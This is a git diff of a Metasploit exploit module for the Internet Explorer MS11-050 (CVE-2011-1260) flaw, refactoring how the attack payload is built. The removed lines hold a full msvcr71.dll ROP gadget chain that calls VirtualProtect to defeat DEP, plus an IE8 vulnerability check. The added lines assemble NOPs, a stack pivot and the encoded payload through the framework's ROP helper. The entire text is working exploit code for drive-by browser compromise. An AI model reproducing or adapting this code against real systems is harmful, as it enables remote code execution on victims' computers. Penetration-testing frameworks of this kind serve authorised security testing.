diff --git a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb index 203a776596..7b86c68a5b 100644 --- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb +++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,19 +11,14 @@ class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "7.0", :ua_maxver => "8.0", :javascript => true, - :os_name => OperatingSystems::WINDOWS, - # If it's IE 8, then we need .net to bypass ASLR - :vuln_test => %Q| - if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) { - if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false } - } - |, + :os_name => OperatingSystems::WINDOWS }) def initialize(info={}) @@ -46,30 +37,29 @@ class Metasploit3 < Msf::Exploit::Remote to bypass DEP (Data Execution Prevention). }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'd0c_s4vage', #Discovery, poc 'sinn3r', #ROP (thx corelanc0d3r), Windows 7 - 'bannedit', #Windows 7 + 'bannedit' #Windows 7 ], 'References' => [ ['CVE', '2011-1260'], ['OSVDB', '72950'], ['MSB', 'MS11-050'], - ['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'], + ['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'InitialAutoRunScript' => 'migrate -f', + 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x09\x0a\x0d'\\", - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'Targets' => @@ -185,42 +175,16 @@ class Metasploit3 < Msf::Exploit::Remote return end - #In case we're using ROP, initialize it now - code = '' - if mytarget['Rop'] - # !mona -m msvcr71 rop - code = [ - 0x7c376402, # POP EBP # RETN [msvcr71.dll] - 0x7c376402, # skip 4 bytes [msvcr71.dll] - 0x7c347f97, # POP EAX # RETN [msvcr71.dll] - 0xfffff800, # Value to negate, will become 0x00000201 (dwSize) - 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] - 0x7c354901, # POP EBX # RETN [msvcr71.dll] - 0xffffffff, - 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] - 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] - 0x7c344f87, # POP EDX # RETN [msvcr71.dll] - 0xffffffc0, # Value to negate, will become 0x00000040 - 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] - 0x7c34d201, # POP ECX # RETN [msvcr71.dll] - 0x7c38b001, # &Writable location [msvcr71.dll] - 0x7c34b8d7, # POP EDI # RETN [msvcr71.dll] - 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] - 0x7c364802, # POP ESI # RETN [msvcr71.dll] - 0x7c3415a2, # JMP [EAX] [msvcr71.dll] - 0x7c347f97, # POP EAX # RETN [msvcr71.dll] - 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] - 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] - 0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll] - ].pack("V*") + p = make_nops(44) #Nops + p << "\xeb\x04\xff\xff" #Jmp over the pivot + p << [mytarget.ret].pack('V') #Stack pivot + p << payload.encoded - code << "\x90"*20 #Nops - code << "\xeb\x04\xff\xff" #Jmp over the pivot - code << [mytarget.ret].pack('V') #Stack pivot + rop_payload = generate_rop_payload('java', p) end - code << payload.encoded + code = (rop_payload) ? rop_payload : payload.encoded # fill the vtable vtable = [mytarget['TargetAddr']].pack('V*')